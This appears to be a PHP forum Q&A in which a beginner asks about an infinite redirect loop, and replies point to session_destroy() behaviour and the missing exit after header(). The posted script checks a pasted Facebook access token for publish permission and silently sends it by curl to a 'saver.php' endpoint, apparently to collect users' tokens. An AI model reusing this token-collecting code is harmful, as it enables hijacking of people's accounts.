# Redirect to many sites how to fix

Tags: php

Why in my this php script page is not loading it browser always say that it redirect you to too many pages I am new in php so help me with correction in my code and thank in advance......I try to remove else but it still doesn't work

```
if($_SESSION['token']){
    $token = $_SESSION['token'];
    $graph_url ="https://graph.facebook.com/me?access_token=" . $token;
    $user = get_json($graph_url);
    if ($user->error) {
        if ($user->error->type== "OAuthException") {
            session_destroy();
            header('Location: index.php?i=1');
            }
        }
}   



if(isset($_POST['submit'])) { $token2 = $_POST['token']; $obj = json_decode($token2); 
$token = $obj->{'access_token'}; $extend = get_html("https://graph.facebook.com/me/permissions?access_token=" . $token); }
        $pos = strpos($extend, "publish_stream");
        if ($pos == true) {
        $_SESSION['token'] = $token;
        $ch = curl_init('http://mysite/saver.php');
        curl_setopt ($ch, CURLOPT_POST, 1);
        curl_setopt ($ch, CURLOPT_POSTFIELDS, "token=".$token);
        curl_setopt($ch, CURLOPT_TIMEOUT, 2);
        curl_exec ($ch);
        curl_close ($ch);
            }
            else {
            session_destroy();
                    header('Location: index.php?i=2');}


if(isset($_POST['logout'])) {
session_destroy();
header('Location: index.php?i=3');
} 
if(isset($_GET['i'])){
        switch($_GET['i']) {
            case 1:
                $errorMsg = "ERROR: Invalid Authentication The Access Token You Entered Is Not Valid."; // For example
            break;
            case 2:
                $errorMsg = "Please Allow App To Access Your Profile!";
            break;
            case 3:
                $errorMsg = "Logout Success!";

            break;
            case 5:
                $errorMsg = "Failed, Time Limit Reached, Please Wait 15 mins Later..";
            break;
            default:
                $errorMsg = "visit every 15mins.";
            break;
        }
         ''.$errorMsg.'';
    }
?>
```

Comment: Examine the Network console and see what's going on.

Comment: I already checked​but I am confused now

Comment: Confused how? What did it show?

Comment: `session_destroy()` does not delete the session data. You'll need to `unset($_SESSION['token'])` to avoid an infinite redirect loop when you get an OAuth exception.

Comment: Wait I don't know how to use this but I check error log in my cpanel and there is nothing any new error but when I try to load site then my browser says 500 it redirect to too many sites

Comment: There won't be any errors in the error log. It's not giving a 500 error, `ERR_TOO_MANY_REDIRECTS` is a browser limitation, not a server one. Examine the contents of the Network tab in dev tools to see which URL it's hitting.

Answer (score 0):

A bit of a different idea for logging out.

1. Create `logout.php`

   `<?php 
   session_start();
   session_destroy();
   header("Location: index.php")
   ?>`
2. Create a php function for logging out.

I know it's not fixing your original problem but it's more efficient meaning you only need to link to logout.php to logout, not run 4 or so lines for each page.

Answer (score 0):

As described in php doc, [session_destory](http://php.net/manual/en/function.session-destroy.php):

> session_destroy() destroys all of the data associated with the current session. It does not unset any of the global variables associated with the session, or unset the session cookie. To use the session variables again, session_start() has to be called.
>
> Note: You do not have to call session_destroy() from usual code. Cleanup $_SESSION array rather than destroying session data.

So ether use session_start or empty the $_SESSION array, and then do the redirect.
And don't forget to "exit" or "die()" after the redirect, to avoid processing of the rest of the code.